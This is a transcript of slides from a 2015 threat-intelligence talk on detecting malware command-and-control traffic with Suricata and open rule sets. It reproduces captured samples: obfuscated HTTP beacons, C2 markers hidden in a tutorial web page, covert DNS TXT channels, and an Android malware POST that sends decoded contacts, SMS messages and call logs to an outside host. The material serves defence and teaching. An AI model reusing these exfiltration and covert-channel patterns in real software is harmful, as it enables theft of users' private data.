Emerging threats jonkman_sans_cti_summit_2015
-
Upload
emerging-threats -
Category
Technology
-
view
442 -
download
3
Transcript of Emerging threats jonkman_sans_cti_summit_2015
CONFIDENTIAL
Threat Intel: Winning the War
with Open Source Tools
Matt Jonkman
CTO, Emerging Threats
President, OISF
2
CONFIDENTIAL
● 13+ year old open IDS community
● ET-Open IDS rules for Snort and Suricata
● ETPro Commercial rules
● IP and DNS reputation feeds
● Query Portal
CONFIDENTIAL
Powering Network Defense Solutions Worldwide
• Installed in 10,000s of IDS/IPS sensors globally
• International staff of top threat researchers
• Trusted for timely, accurate, comprehensive threat intelligence
3
• HQ in Indianapolis, IN
• Originally founded as open source community in 2003
• Industry-leading cyber threat intelligence services• ETPro™ Ruleset
• IQRisk™ Rep List
• IQRisk™ Query
• 500+ customers in over 40 countries worldwide
4
● The Problem: Malware, Kits, Zombies →
● How to APPLY data
● Suricata + Kibana + ETOpen + Rep Feeds
Agenda
1
0
‣ IRC
‣ HTTP
‣ Non-Standard Protocols
‣ Custom Binary Channels
‣ Encrypted Channels
Command and Control
1
1
‣ SSL
‣ Emulate Known Good
‣ Social Networks
‣ Covert DNS Channels
‣ IM Networks
‣ SMS
Command and Control
1
2
Hello
xxxxxxxxxxxxxxxx.Windows XP.GT.Intel Pentium III Xeon
processor.x86 Family 6 Model 7 Stepping xxx
Mhz.xxxxxxx.RAM: 71 % used.RAM Total: xxxx MBs.Page
File: xxxx MBs.Page File Disponible: xxxx MBs.Virt Mem
Total: xxxxxxx MBs.Virt Mem Disponible: xxxxx MBs.Sin
Asignar.192.168.xxxx xxx xx.<xxxxx>--
1
3
inicio#&'b##'#UserXXXX#&'b##'#192.168.XX.5#&'b##'#XX
#&'b##'#XX-FXXXXXXXX5D#&'b##'#Microsoft Windows
XP/Service Pack 3
1
4
GET /index.html&_=13297496 HTTP/1.1
User-Agent: C3F0F3F7F6F485F4F4F9F7F3FAF9FBFAF3F5F9ACAFAEA6B1F2F9F3
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.<redacted>.tk
In Plain Sight...
GET / HTTP/1.1
User-Agent:
1427242021235223232E20242D2E213A253A26242E2525262621242E7B78797166252E
24
Host: xx5c1b1ea.ws
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.1.11
Date: Sat, 07 Jan 2012 00:51:49 GMT
Content-Type: text/html
Content-Length: 189
Connection: keep-alive
Vary: Accept-Encoding
Expires: Wed, 28 Dec 2011 00:51:49 GMT
Cache-Control: no-cache
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
<html>
<head>
<body style='margin:0px;padding:0px'>
<iframe border='none' style='width:100%;height:100%;border:medium
none;' src='http://1.ws/wc/"xx5c1b01ea.ws"'></iframe>
</body>
</html>
<!-- k7a63YKrBr5NBnpY --><html><head><meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>C# Tutorial: GDI Drawing with Pen and Brush</title>
<LINK REL=StyleSheet HREF="default-1.css" tppabs="http://csharpcomputing.com/Tutorials/default.css" type="text/css">
</head><body>
<p> <a href="Lesson14.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson14.htm"><img border="0" src="PreviousArrow.gif"
tppabs="http://csharpcomputing.com/images/PreviousArrow.gif" width="26" height="26"></a>
<a href="index.htm" tppabs="http://csharpcomputing.com/Tutorials/index.htm"><img border="0" src="TOCIcon.gif"
tppabs="http://csharpcomputing.com/images/TOCIcon.gif" width="26" height="26"></a>
<a href="Lesson16.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson16.htm"><img border="0" src="NextArrow.gif"
tppabs="http://csharpcomputing.com/images/NextArrow.gif" width="26" height="26"></a></p>
<p><img border="0" src="blueline.gif" tppabs="http://csharpcomputing.com/images/blueline.gif" width="550" height="8"></p>
<h1>C# Tutorial, Lesson 15: Drawing with Pen and Brush.<br>
</h1>
<!-- {/*jgJ-.J} -->
<p>In this lesson I would like to introduce the Pen and the Brush objects. These objects are members of GDI+ library.
GDI+ or GDI.NET is a graphics library that lets you draw on a form. Prior to
.NET, C programmers were using GDI library to create breathtaking graphics.
GDI.NET is in fact just a wrapper for GDI. GDI+ is a great platform for
moderately complicated static graphs. However, it tends to be slow for moving
images and not sophisticated enough for 3 dimensional graphics. On Windows NT
platforms, GDI+ as well as GDI do not perform very well. The problem lies in the
way GDI/GDI+ runs. Windows NT architecture accepts user input in so called user
context and access graphics devices in system context. When GDI/GDI+ application
runs on Windows NT based machine, it has to constantly wait for these context
switches to occur. This makes GDI/GDI+ applications too slow for video game
programming and fancy 3 D graphics. Microsoft recently released a highly
optimized graphics platform - Managed DirectX which I will cover in a separate
tutorial.</p>
<script type="text/javascript"
src="show_ads.js" tppabs="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<p>The
<!-- k7a63YKrBr5NBnpY --><html><head><meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>C# Tutorial: GDI Drawing with Pen and Brush</title>
<LINK REL=StyleSheet HREF="default-1.css" tppabs="http://csharpcomputing.com/Tutorials/default.css" type="text/css">
</head><body>
<p> <a href="Lesson14.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson14.htm"><img border="0" src="PreviousArrow.gif"
tppabs="http://csharpcomputing.com/images/PreviousArrow.gif" width="26" height="26"></a>
<a href="index.htm" tppabs="http://csharpcomputing.com/Tutorials/index.htm"><img border="0" src="TOCIcon.gif"
tppabs="http://csharpcomputing.com/images/TOCIcon.gif" width="26" height="26"></a>
<a href="Lesson16.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson16.htm"><img border="0" src="NextArrow.gif"
tppabs="http://csharpcomputing.com/images/NextArrow.gif" width="26" height="26"></a></p>
<p><img border="0" src="blueline.gif" tppabs="http://csharpcomputing.com/images/blueline.gif" width="550" height="8"></p>
<h1>C# Tutorial, Lesson 15: Drawing with Pen and Brush.<br>
</h1>
<!-- {/*jgJ-.J} --><p>In this lesson I would like to introduce the Pen and the Brush objects. These objects are members of GDI+ library.
GDI+ or GDI.NET is a graphics library that lets you draw on a form. Prior to
.NET, C programmers were using GDI library to create breathtaking graphics.
GDI.NET is in fact just a wrapper for GDI. GDI+ is a great platform for
moderately complicated static graphs. However, it tends to be slow for moving
images and not sophisticated enough for 3 dimensional graphics. On Windows NT
platforms, GDI+ as well as GDI do not perform very well. The problem lies in the
way GDI/GDI+ runs. Windows NT architecture accepts user input in so called user
context and access graphics devices in system context. When GDI/GDI+ application
runs on Windows NT based machine, it has to constantly wait for these context
switches to occur. This makes GDI/GDI+ applications too slow for video game
programming and fancy 3 D graphics. Microsoft recently released a highly
optimized graphics platform - Managed DirectX which I will cover in a separate
tutorial.</p>
<script type="text/javascript"
src="show_ads.js" tppabs="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<p>The
2
3
23546.1.d869c6f2f70dd3dcf64b047f99f46be8.chr.santa-inbox.com
0-4-2-6-4-1-9-2-e-8-v-3-c-g-o-s-0-s-0-o-s-1-b-e-6-u-v-3-f-r-k.0-0-0-0-0-0-0-0-0-0-0-0-0-60-0-0-0-0-0-0-0-0-0-0-0-0-0.info
Covert DNS Channels
2
4
Request: TXT
2.32206.pf.deoderante.com
Response:
E9XnBP6CTP7zjAK43bg3RWWBwX5JpuFyTTpphcekpDR9nFPT7kzB3WEf9xe7fUAeFH4h1xWODFappd3kVXwLLdzAzjDSUs/ssIHbc8OFxhrw1D5Uh3UI1il+d5sa3oKB8qqo9oA8d5Jy4g7uwiScX+cBVkkrMMSsrAYTAiOjQswiVgU5AxQMybshGD0H0jRJVjBob6CLqMgcO0mpzxR1ccVbb8oG"
Covert DNS Channels
2
5
"606.32206.pf.deoderante.com" "YSVYuqd74esaWH10c1EpO+MlAHKnQYqmETuEmHsaBHNYXms0/cL741mv0/ZmFmH8rQPc/B2omFruELm/SoDpbKrXTXQQ3fGk8r8QwNserz4SsHvcb98MCf9hpXwz"606.32206.pf.deoderante.com" "YSVYuqd74esaWH10c1EpO+MlAHKnQYqmETuEmHsaBHNYXms0/cL741mv0/ZmFmH8rQPc/B2omFruELm/SoDpbKrXTXQQ3fGk8r8QwNserz4SsHvcb98MCf9hpXwz"125.32206.pf.deoderante.com" "ggSpBMkIvbQslNeiqAu47PnoWzYGV+8Z+3QJy06TYqoEJOHamYVvr7Wqh+zunjz3AkMPOr/aQoG5eytRn0zFxrU6tWGs8hHtVBh+YKExbc420fkDd+7hEgLAde5zpAiF4w7c"125.32206.pf.deoderante.com" "ggSpBMkIvbQslNeiqAu47PnoWzYGV+8Z+3QJy06TYqoEJOHamYVvr7Wqh+zunjz3AkMPOr/aQoG5eytRn0zFxrU6tWGs8hHtVBh+YKExbc420fkDd+7hEgLAde5zpAiF4w7c"125.32206.pf.deoderante.com" "ggSpBMkIvbQslNeiqAu47PnoWzYGV+8Z+3QJy06TYqoEJOHamYVvr7Wqh+zunjz3AkMPOr/aQoG5eytRn0zFxrU6tWGs8hHtVBh+YKExbc420fkDd+7hEgLAde5zpAiF4w7c"129.32206.pf.deoderante.com" "xf6cEqa+Kd9VHXFIglLDOmRprsAm0y+cGQetG9Ox+oTmKueMnNRMsw7y8Z3qwbm1foIEWo80bYoP894mAU1SmSOczlZJl2SOfUzDfqXk0EVoTYpqojSL/el6P3X74b"129.32206.pf.deoderante.com" "xf6cEqa+Kd9VHXFIglLDOmRprsAm0y+cGQetG9Ox+oTmKueMnNRMsw7y8Z3qwbm1foIEWo80bYoP894mAU1SmSOczlZJl2SOfUzDfqXk0EVoTYpqojSL/el6P3X74b"129.32206.pf.deoderante.com" "xf6cEqa+Kd9VHXFIglLDOmRprsAm0y+cGQetG9Ox+oTmKueMnNRMsw7y8Z3qwbm1foIEWo80bYoP894mAU1SmSOczlZJl2SOfUzDfqXk0EVoTYpqojSL/el6P3X74b"258.32206.pf.deoderante.com" "6Wq0OwvOLXPc4pY+ZEiwckGuOj2ytpWGIRqJVvaIigexqtErvq2eB4snZ98ai4/akXm51LTtSd/Ab6znCgv3J8Fp5rqHfxclsZsIg4sQgsg6OSXnIbe6KqA8fqpcmySO3asGYKSpiq4"258.32206.pf.deoderante.com" "6Wq0OwvOLXPc4pY+ZEiwckGuOj2ytpWGIRqJVvaIigexqtErvq2eB4snZ98ai4/akXm51LTtSd/Ab6znCgv3J8Fp5rqHfxclsZsIg4sQgsg6OSXnIbe6KqA8fqpcmySO3asGYKSpiq4"258.32206.pf.deoderante.com" "6Wq0OwvOLXPc4pY+ZEiwckGuOj2ytpWGIRqJVvaIigexqtErvq2eB4snZ98ai4/akXm51LTtSd/Ab6znCgv3J8Fp5rqHfxclsZsIg4sQgsg6OSXnIbe6KqA8fqpcmySO3asGYKSpiq4"82.32206.pf.deoderante.com" "wZrGGAUcq6KyLpHS6UJ33gsU9nHlVKVQb0c/vW/SMqcBJBGCAXgWhuM/Yznuy2GxuGqofc00+/WZDDXggkjMatgMGwpuxnTulFhMltiUPDeZqIuwMvuEL5W8U/iR"82.32206.pf.deoderante.com" "wZrGGAUcq6KyLpHS6UJ33gsU9nHlVKVQb0c/vW/SMqcBJBGCAXgWhuM/Yznuy2GxuGqofc00+/WZDDXggkjMatgMGwpuxnTulFhMltiUPDeZqIuwMvuEL5W8U/iR"82.32206.pf.deoderante.com" "wZrGGAUcq6KyLpHS6UJ33gsU9nHlVKVQb0c/vW/SMqcBJBGCAXgWhuM/Yznuy2GxuGqofc00+/WZDDXggkjMatgMGwpuxnTulFhMltiUPDeZqIuwMvuEL5W8U/iR"102.32206.pf.deoderante.com" "NcZigfVXSSbQvBgvyTzOswy2FycXceUFIuFpv3LCtKmtEZp1dv5j/46+/hHUbqdDktJrJwtf7m5kbTsehyGSuge/sI+3kpuHvfDLq7BhJjxnowc4cfSjnxtUrddTLwmaDdqdTLGpMJA"102.32206.pf.deoderante.com" "NcZigfVXSSbQvBgvyTzOswy2FycXceUFIuFpv3LCtKmtEZp1dv5j/46+/hHUbqdDktJrJwtf7m5kbTsehyGSuge/sI+3kpuHvfDLq7BhJjxnowc4cfSjnxtUrddTLwmaDdqdTLGpMJA"102.32206.pf.deoderante.com" "NcZigfVXSSbQvBgvyTzOswy2FycXceUFIuFpv3LCtKmtEZp1dv5j/46+/hHUbqdDktJrJwtf7m5kbTsehyGSuge/sI+3kpuHvfDLq7BhJjxnowc4cfSjnxtUrddTLwmaDdqdTLGpMJ"77.32206.pf.deoderante.com" "yXdQW5d2ZP7flSblgCSyk+dw5l3htIA+cAzVH77xDYDygFKdr/uR+88sdtq9YgjnWLKYCSP3y4AlL/pdx5MEvQl/CkFB6CwDtIqTMf4Jv0CeAHSgDOH0g8cfzO+tH5YbjNF1a"77.32206.pf.deoderante.com" "yXdQW5d2ZP7flSblgCSyk+dw5l3htIA+cAzVH77xDYDygFKdr/uR+88sdtq9YgjnWLKYCSP3y4AlL/pdx5MEvQl/CkFB6CwDtIqTMf4Jv0CeAHSgDOH0g8cfzO+tH5YbjNF1a"346.32206.pf.deoderante.com" "NlqjMiVKOLB/nLZ+w7x1130GwXmfICCvuLcyLGQDRxBWeTNbP5K8u9qlyX4WzcEWoPHkKcY/Ql+B63+zOwoGjnGbkmrKxefk+BxVFrs+ll+2/4k2WtwaltVdNKpa2A"346.32206.pf.deoderante.com" "NlqjMiVKOLB/nLZ+w7x1130GwXmfICCvuLcyLGQDRxBWeTNbP5K8u9qlyX4WzcEWoPHkKcY/Ql+B63+zOwoGjnGbkmrKxefk+BxVFrs+ll+2/4k2WtwaltVdNKpa2A"346.32206.pf.deoderante.com" "NlqjMiVKOLB/nLZ+w7x1130GwXmfICCvuLcyLGQDRxBWeTNbP5K8u9qlyX4WzcEWoPHkKcY/Ql+B63+zOwoGjnGbkmrKxefk+BxVFrs+ll+2/4k2WtwaltVdNKpa2A
2
6
Android!POST /upload.php HTTP/1.1
accept: application/json
Content-Length: 2958
Content-Type: application/x-www-form-urlencoded
Host: gi60s.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Expect: 100-Continue
code=bb51d&data=%7B%22contacts%22%3A%5B%7B+%22name%22%3A%22Qm9i%0A%22%2C%22numbers%22%3A%22MDgxLTUwMTItMzQ1N
>jc4OTswODEtNTAxLTIzNDU2Nzg5Ow%3D%3D%0A%22%7D%2C%7B+%22name%22%3A%22RXZl%0A%22%2C%22numbers%22%3A%22MDY1LTAzM
>S0zMzc7MDY1LTAzMS0zMzc7%0A%22%7D%2C%7B+%22name%22%3A%22VHJlbnQ%3D%0A%22%2C%22numbers%22%3A%22MDE5LTk5OTswMTk
>tOTk5Ow%3D%3D%0A%22%7D%5D%2C%22sms%22%3A%5B%7B+%22address%22%3A%22MDgxNTEyMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%2
>2%3A%221%22%2C%22date%22%3A%221337803772831%22%2C%22body%22%3A%22SGVsbG8gV29ybGQh%0A%22%7D%2C%7B+%22address%
>22%3A%22MDEwMjM0NQ%3D%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766125374%22%2C%22body%22%3A%22W
>W91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdXIgQkFOSyE%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDY1MDMx
>MzM3%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766074005%22%2C%22body%22%3A%22SGkhIEhvdyBhcmUgeW91P
>w%3D%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxNTAxMjM0NTY3ODk%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3
>A%221337765998741%22%2C%22body%22%3A%22VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbjB0UzNjcjNUIGdyZWV0eg%3D
>%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22
>%3A%221337765942437%22%2C%22body%22%3A%22TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3Q%3D%0A%22%7D%2C%7B+%22ad
>dress%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765923366%22%2
>C%22body%22%3A%22SGkgQm9iLCBob3cgYXJlIHlvdT8%3D%0A%22%7D%5D%2C%22recent%22%3A%5B%7B+%22number%22%3A%220815123456789%22%2C%22type%22%3A%223%22%2C%22date%2
2%3A%221337
>803772327%22%2C%22duration%22%3A%220%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%22%3A%221%22%2C%22
>date%22%3A%221337766141605%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%2
>2%3A%222%22%2C%22date%22%3A%221337766020756%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%220815012
>3456789%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765897517%22%2C%22duration%22%3A%224%22%7D%5D%2C%22u
>rl%22%3A%5B%7B+%22url%22%3A%22aHR0cDovL3d3dy5iYmMuY28udWsv%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53ZWF
>0aGVyLmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5hbWF6b24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%
>3A%22aHR0cDovL2VzcG4uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8%3D%0A%22%7D%
>2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy
>5lYmF5LmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw%3D%3D%0A%22%7D%2C%7B+%22ur
>l%22%3A%22aHR0cDovL3d3dy5mYWNlYm9vay5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5teXNwYWNlLmNvbS8%3D%
>0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5tc24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5
>5YWhvby5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRy
>b2lkY2xpZW50%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3d
POST /upload.php HTTP/1.1
accept: application/json
Content-Length: 2958
Content-Type: application/x-www-form-urlencoded
Host: gi60s.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Expect: 100-Continue
code=bb51d&data=%7B%22contacts%22%3A%5B%7B+%22name%22%3A%22Qm9i%0A%22%2C%22numbers%22%3A%22MDgxLTUwMTItMzQ1N
>jc4OTswODEtNTAxLTIzNDU2Nzg5Ow%3D%3D%0A%22%7D%2C%7B+%22name%22%3A%22RXZl%0A%22%2C%22numbers%22%3A%22MDY1LTAzM
>S0zMzc7MDY1LTAzMS0zMzc7%0A%22%7D%2C%7B+%22name%22%3A%22VHJlbnQ%3D%0A%22%2C%22numbers%22%3A%22MDE5LTk5OTswMTk
>tOTk5Ow%3D%3D%0A%22%7D%5D%2C%22sms%22%3A%5B%7B+%22address%22%3A%22MDgxNTEyMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%2
>2%3A%221%22%2C%22date%22%3A%221337803772831%22%2C%22body%22%3A%22SGVsbG8gV29ybGQh%0A%22%7D%2C%7B+%22address%
>22%3A%22MDEwMjM0NQ%3D%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766125374%22%2C%22body%22%3A%22W
>W91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdXIgQkFOSyE%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDY1MDMx
>MzM3%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766074005%22%2C%22body%22%3A%22SGkhIEhvdyBhcmUgeW91P
>w%3D%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxNTAxMjM0NTY3ODk%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3
>A%221337765998741%22%2C%22body%22%3A%22VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbjB0UzNjcjNUIGdyZWV0eg%3D
>%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22
>%3A%221337765942437%22%2C%22body%22%3A%22TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3Q%3D%0A%22%7D%2C%7B+%22ad
>dress%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765923366%22%2
>C%22body%22%3A%22SGkgQm9iLCBob3cgYXJlIHlvdT8%3D%0A%22%7D%5D%2C%22recent%22%3A%5B%7B+%22number%22%3A%22081512
>3456789%22%2C%22type%22%3A%223%22%2C%22date%22%3A%221337
>803772327%22%2C%22duration%22%3A%220%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%22%3A%221%22%2C%22
>date%22%3A%221337766141605%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%2
>2%3A%222%22%2C%22date%22%3A%221337766020756%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%220815012
>3456789%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765897517%22%2C%22duration%22%3A%224%22%7D%5D%2C%22u
>rl%22%3A%5B%7B+%22url%22%3A%22aHR0cDovL3d3dy5iYmMuY28udWsv%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53ZWF
>0aGVyLmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5hbWF6b24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%
>3A%22aHR0cDovL2VzcG4uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8%3D%0A%22%7D%
>2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy
>5lYmF5LmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw%3D%3D%0A%22%7D%2C%7B+%22ur
>l%22%3A%22aHR0cDovL3d3dy5mYWNlYm9vay5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5teXNwYWNlLmNvbS8%3D%
>0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5tc24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5
>5YWhvby5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRy
>b2lkY2xpZW50%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3d
code=bb51d&data=
{"contacts":[
{"name":"Qm9i","numbers":"MDgxLTUwMTItMzQ1Njc4OTswODEtNTAxLTIzNDU2Nzg5Ow=="},{"name":"RXZl","numbers":"MDY1LTAzMS0zMzc7MDY
1LTAzMS0zMzc7"},
{"name":"VHJlbnQ=","numbers":"MDE5LTk5OTswMTktOTk5Ow=="}],
"sms":[
{"address":"MDgxNTEyMzQ1Njc4OQ==","type":"1","date":"1337803772831","body":"SGVsbG8gV29ybGQh"},
{"address":"MDEwMjM0NQ==","type":"1","date":"1337766125374","body":"WW91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdX
IgQkFOSyE="},
{"address":"MDY1MDMxMzM3","type":"1","date":"1337766074005","body":"SGkhIEhvdyBhcmUgeW91Pw=="},
{"address":"MDgxNTAxMjM0NTY3ODk=","type":"1","date":"1337765998741","body":"VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbj
B0UzNjcjNUIGdyZWV0eg=="},
{"address":"MDgxLTUwMTItMzQ1Njc4OQ==","type":"2","date":"1337765942437","body":"TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3
Q="},
{"address":"MDgxLTUwMTItMzQ1Njc4OQ==","type":"2","date":"1337765923366","body":"SGkgQm9iLCBob3cgYXJlIHlvdT8="}],
"recent":[
{"number":"0815123456789","type":"3","date":"1337803772327","duration":"0"},
{"number":"065031337","type":"1","date":"1337766141605","duration":"4"},
{"number":"065031337","type":"2","date":"1337766020756","duration":"4"},
{"number":"08150123456789","type":"2","date":"1337765897517","duration":"4"}],
"url":[
{"url":"aHR0cDovL3d3dy5iYmMuY28udWsv"},
{"url":"aHR0cDovL3d3dy53ZWF0aGVyLmNvbS8="},
{"url":"aHR0cDovL3d3dy5hbWF6b24uY29tLw=="},
{"url":"aHR0cDovL2VzcG4uY29tLw=="},
{"url":"aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8="},
{"url":"aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw="},
{"url":"aHR0cDovL3d3dy5lYmF5LmNvbS8="},
{"url":"aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw=="},
{"url":"aHR0cDovL3d3dy5mYWNlYm9vay5jb20v"},
{"url":"aHR0cDovL3d3dy5teXNwYWNlLmNvbS8="},
{"url":"aHR0cDovL3d3dy5tc24uY29tLw=="},
{"url":"aHR0cDovL3d3dy55YWhvby5jb20v"},
{"url":"aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRyb2lkY2xpZW50"}
code=bb51d&data=
{"contacts":[
{"name":"Bob","numbers":"081-5012-3456789;081-501-23456789;"},
{"name":"Eve","numbers":"065-031-337;065-031-337;"},
{"name":"Trent","numbers":"019-999;019-999;"}],
"sms":[
{"address":"0815123456789","type":"1","date":"1337803772831","body":"lo World!"},
{"address":"0102345","type":"1","date":"1337766125374","body":"Your smsTan: t4nS3cr3T Best Regards your
BANK!"},
{"address":"065031337","type":"1","date":"1337766074005","body":"Hi! How are you?"},
{"address":"08150123456789","type":"1","date":"1337765998741","body":"Thx for the password :) Mine is:
n0tS3cr3T greetz"},
{"address":"081-5012-3456789","type":"2","date":"1337765942437","body":"My secret password is: t0ps3cr3t"},
{"address":"081-5012-3456789","type":"2","date":"1337765923366","body":"Hi Bob, how are you?"}],
"recent":[
{"number":"0815123456789","type":"3","date":"1337803772327","duration":"0"},
{"number":"065031337","type":"1","date":"1337766141605","duration":"4"},
{"number":"065031337","type":"2","date":"1337766020756","duration":"4"},
{"number":"08150123456789","type":"2","date":"1337765897517","duration":"4"}],
"url":[
{ "url":"http://www.bbc.co.uk/"},
{ "url":"http://www.weather.com/"},
{ "url":"http://www.amazon.com/"},
{ "url":"http://espn.com/"},
{ "url":"http://www.nytimes.com/"},
{ "url":"http://www.cnn.com/"},
{ "url":"http://www.ebay.com/"},
{ "url":"http://www.wikipedia.org/"},
{ "url":"http://www.facebook.com/"},
{ "url":"http://www.myspace.com/"},
{ "url":"http://www.msn.com/"},
{ "url":"http://www.yahoo.com/"},
{ "url":"http://picasaweb.google.com/m/viewer?source=androidclient"}
Suricata – Cost-effective IDS
• Open-source IDPS
• Developed by the OISF
• First beta introduced in December 2009
• Supported OS
• FreeBSD
• Linux
• UNIX
• Mac OS
• Microsoft Windows
• Licensing and Availability
• GNU General Public License
• www.suricata-ids.org
{"timestamp":"2014-11-
18T12:40:42.744230","flow_id":2901423184,"event_ty
pe":"fileinfo","src_ip":"213.136.29.218","src_port":80,"d
est_ip":"192.168.1.4","dest_port":53652,"proto":"TCP",
"http":{"url":"/ubuntu/pool/main/u/util-
linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","hostname":"nl.archive.ubunt
u.com","http_user_agent":"Debian APT-
HTTP/1.3(1.0.1ubuntu2)"},"fileinfo":{"filename":"/ubunt
u/pool/main/u/util-linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","magic":"Debian binary
package
(format2.0)","state":"CLOSED","md5":"6a1a4e3b53d4ff
02cd3ded3cf0ce3a42","stored":false,"size":5475,"tx_id
":2}}
{"timestamp":"2014-11-
18T12:40:42.744230","flow_id":2901423184,"event_ty
pe":"fileinfo","src_ip":"213.136.29.218","src_port":80,"d
est_ip":"192.168.1.4","dest_port":53652,"proto":"TCP",
"http":{"url":"/ubuntu/pool/main/u/util-
linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","hostname":"nl.archive.ubunt
u.com","http_user_agent":"Debian APT-
HTTP/1.3(1.0.1ubuntu2)"},"fileinfo":{"filename":"/ubunt
u/pool/main/u/util-linux/bsdutils_2.20.1-
5.1ubuntu20.3_i386.deb","magic":"Debian binary
package
(format2.0)","state":"CLOSED","md5":"6a1a4e3b53d4ff
02cd3ded3cf0ce3a42","stored":false,"size":5475,"tx_id
":2}}
{"timestamp":"2014-11-
18T12:40:42.744230","flow_id":2901423184,"event_ty
